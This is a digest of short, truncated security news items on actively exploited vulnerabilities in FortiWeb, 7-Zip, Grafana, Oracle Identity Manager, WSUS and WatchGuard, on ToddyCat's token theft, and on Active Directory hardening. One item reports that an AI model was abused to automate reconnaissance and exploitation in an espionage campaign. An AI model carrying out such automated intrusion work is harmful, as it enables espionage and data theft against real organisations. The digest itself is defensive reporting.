FortiWeb under pressure: patch now, not later. Fortinet warned that FortiWeb has a vulnerability (CVE-2025-58034) exploited in the wild, alongside a separate, more severe path-traversal (CVE-2025-64446) fixed in 8.0.2. The flaws can allow unauthenticated attackers to run admin commands or inject OS commands. Customers should upgrade to patched versions immediately and review logs for compromise […]
7-Zip: tidy little utility, messy little bug. A 7-Zip flaw (CVE-2025-11001) involving symbolic links has drawn urgent warnings. The Hacker News notes advisories that said the bug is being exploited, with fixes in 7-Zip 25.00. Admins should upgrade and be cautious opening archives from untrusted sources. (Note: subsequent NHS updates clarified they’d seen PoC availability […]
Grafana CVSS 10.0 SCIM flaw Grafana fixed a CVSS 10.0 vulnerability in SCIM (Enterprise editions) that could let attackers sign in as admin. The bug was discovered internally on 4 Nov 2025; patches followed quickly. Grafana Cloud wasn’t affected. Admins should upgrade to the fixed versions immediately and review access logs for suspicious logins. This […]
Oracle Identity Manager under fire — CISA sounds the alarm. CISA added a critical Oracle Identity Manager flaw to the Known Exploited Vulnerabilities (KEV) catalogue, citing live attacks. The issue (CVSS ~9.8) enables remote code execution and full takeover of identity infrastructure if left unpatched. Agencies must remediate by the KEV deadline; enterprises should treat […]
WSUS abused to drop ShadowPad — patch first, ask questions after. Threat actors are abusing a freshly patched WSUS flaw (CVE-2025-59287) to push ShadowPad malware and gain full SYSTEM access. Reports note attackers chaining living-off-the-land tools (PowerShell, certutil, curl) and DLL side-loading to land ShadowPad after initial WSUS abuse. Mitigation is straightforward: apply Microsoft’s out-of-band […]
ToddyCat’s new party trick: stealing your tokens (and your Outlook) Security researchers say the APT “ToddyCat” has upgraded its toolkit to pinch Outlook mail and Microsoft 365 access tokens. Fresh modules — including TCSectorCopy and TomBerBil — are tuned to swipe browser cookies/credentials (Chrome/Edge) and lift mailbox data directly from disk, helping the group persist […]
Active Directory Under Siege: Why Critical Infrastructure Needs Stronger Security The piece argues that Active Directory remains the crown-jewel target across enterprises and critical infrastructure. Complexity, legacy protocols and slow patch cycles (including a major 2025 privilege-escalation flaw) keep AD vulnerable. It recommends identity-first Zero Trust, privileged access tiering, hardening Kerberos/NTLM, rapid patching of domain […]
CISA Flags Critical WatchGuard Fireware Flaw (CVE-2025-9242) CISA added CVE-2025-9242 to its KEV catalogue, warning that 54,000+ WatchGuard Fireboxes are exposed. The flaw is an out-of-bounds write in the iked process that can enable unauthenticated remote code execution. Affected Fireware versions span 11.10.2–11.12.4_U1, 12.0–12.11.3 and 2025.1. WatchGuard patched in September; agencies and enterprises should update, […]
Chinese Hackers Use Anthropic’s AI to Launch Automated Espionage Anthropic reports China-linked actors abused its AI (Claude) to run a largely automated cyber-espionage campaign against ~30 organisations in September 2025. Researchers say 80–90% of operations were automated, with AI assisting reconnaissance, exploitation and data handling. Some intrusions succeeded before detection and disruption. The incident spotlights […]
